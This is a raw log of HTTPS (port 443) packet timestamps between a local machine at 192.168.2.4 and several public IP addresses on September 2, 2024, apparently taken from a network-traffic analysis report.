          Sep 2, 2024 00:25:16.490881920 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.490920067 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.490926027 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.491060019 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.491100073 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.491106987 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.492185116 CEST44349749172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.492230892 CEST44349749172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.492314100 CEST44349749172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.492326975 CEST49749443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.492358923 CEST49749443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.495753050 CEST44349745184.28.90.27192.168.2.4
          Sep 2, 2024 00:25:16.495922089 CEST44349745184.28.90.27192.168.2.4
          Sep 2, 2024 00:25:16.495966911 CEST49745443192.168.2.4184.28.90.27
          Sep 2, 2024 00:25:16.497014046 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.497041941 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.497066021 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.497087955 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.497100115 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.497121096 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.538321018 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538369894 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538408041 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538429976 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.538441896 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538454056 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538484097 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.538501978 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538541079 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.538551092 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538580894 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.538625002 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.538635015 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.539264917 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.539316893 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.539324045 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.559922934 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.559978962 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.559984922 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560082912 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560127020 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.560136080 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560281992 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560400009 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560425043 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560446978 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.560451984 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.560470104 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.561379910 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.561424017 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.561428070 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.561520100 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.561537027 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.561570883 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.561575890 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.561664104 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.561902046 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562072992 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562110901 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.562115908 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562864065 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562932968 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562978029 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.562988043 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.562993050 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563010931 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563014030 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.563054085 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.563057899 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563877106 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563900948 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563940048 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.563945055 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.563992023 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.574387074 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.574455976 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.574462891 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.574759007 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.574819088 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.574826002 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575227022 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575253963 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575303078 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.575309992 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575458050 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.575593948 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575803041 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575833082 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575853109 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.575859070 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.575939894 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.576549053 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576657057 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576693058 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576715946 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.576721907 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576751947 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.576759100 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576848030 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.576895952 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.592164040 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.592184067 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.616987944 CEST49745443192.168.2.4184.28.90.27
          Sep 2, 2024 00:25:16.616998911 CEST44349745184.28.90.27192.168.2.4
          Sep 2, 2024 00:25:16.617021084 CEST49745443192.168.2.4184.28.90.27
          Sep 2, 2024 00:25:16.617026091 CEST44349745184.28.90.27192.168.2.4
          Sep 2, 2024 00:25:16.628693104 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.628741980 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.628751993 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.628976107 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629081011 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.629087925 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629190922 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629237890 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.629245043 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629345894 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629385948 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.629393101 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.629993916 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.630037069 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.630043030 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.630182981 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.630208015 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.630248070 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.630256891 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.630299091 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.630353928 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631119013 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631153107 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631181955 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631196976 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.631206036 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631227016 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.631341934 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.631583929 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.631589890 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.632137060 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.632165909 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.632185936 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.632194042 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.632282972 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.635382891 CEST49747443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.635392904 CEST44349747172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.636116028 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.641872883 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642061949 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642091036 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642112017 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.642121077 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642160892 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.642190933 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642267942 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.642313004 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.642946959 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.642963886 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.643209934 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.643871069 CEST49751443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.643877029 CEST44349751172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.644424915 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.644439936 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.644526005 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.644996881 CEST49749443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.645003080 CEST44349749172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.646270990 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.646284103 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.648307085 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.648323059 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.684381962 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.684392929 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.706070900 CEST49748443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.706089973 CEST44349748172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.706770897 CEST49746443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.706775904 CEST44349746172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717092991 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717149019 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717158079 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717227936 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717267036 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717297077 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717304945 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717308044 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717323065 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717338085 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717370033 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717379093 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717389107 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717412949 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717418909 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717431068 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717459917 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717466116 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.717473984 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.717504978 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.719260931 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.719315052 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.719321966 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.719362020 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.719460964 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.719511986 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.719633102 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.719691992 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.720231056 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.720284939 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.720366001 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.720415115 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.720530987 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.720580101 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.721201897 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.721267939 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.721380949 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.721438885 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.721550941 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.721612930 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.779005051 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:16.789509058 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:16.794918060 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:16.808458090 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.808554888 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.808607101 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.808655024 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.808754921 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.808804035 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.809462070 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.809514999 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.809628963 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.809676886 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.809988976 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.810034037 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.810158968 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.810213089 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.810336113 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.810367107 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.810386896 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.810395002 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.810405970 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.811157942 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811218977 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.811225891 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811268091 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.811321020 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811374903 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.811506987 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811557055 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.811562061 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811604023 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:16.811692953 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:16.826128006 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:16.829546928 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:16.847517014 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:16.893531084 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:16.897180080 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.085078001 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.088113070 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.088131905 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.089291096 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.089303017 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.089379072 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.097381115 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.098436117 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.098449945 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.098664045 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.098699093 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.098826885 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.098841906 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.099092960 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.099520922 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.099530935 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.099654913 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.099673986 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.099701881 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.099838018 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.099848032 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.099886894 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.099967957 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.099983931 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.100044966 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.103203058 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.103281021 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.108273983 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.108283043 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.108647108 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.109046936 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.109124899 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.111701012 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.111783028 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.112253904 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.112337112 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.112771034 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.112854004 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.114018917 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.114092112 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.114428997 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.114434958 CEST44349754104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.114677906 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.114690065 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.114790916 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.114799976 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.114895105 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.114934921 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.114943027 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.115030050 CEST49757443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.123946905 CEST49750443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.123958111 CEST44349750172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.134927988 CEST49758443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.134948015 CEST44349758172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.135263920 CEST49758443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.135638952 CEST49758443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.135653973 CEST44349758172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.156497002 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.157883883 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.160500050 CEST44349757172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.160530090 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.191159010 CEST49754443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.192928076 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.214965105 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215010881 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215039015 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215064049 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215089083 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.215096951 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215109110 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215140104 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.215152979 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.215158939 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215785980 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215816975 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215857983 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.215867043 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.215908051 CEST49752443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.219583988 CEST44349752104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221360922 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221406937 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221442938 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221462965 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.221473932 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221502066 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221518040 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.221524954 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.221565962 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.221795082 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222006083 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222048044 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222079039 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222105980 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222122908 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.222131968 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222141027 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.222213984 CEST44349755104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222322941 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222378016 CEST49755443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.222754002 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.222774982 CEST49753443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:17.222781897 CEST44349753104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:17.222810984 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.222891092 CEST44349756172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:17.222929955 CEST49756443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:17.224591970 CEST44349754104.21.47.250192.168.2.4
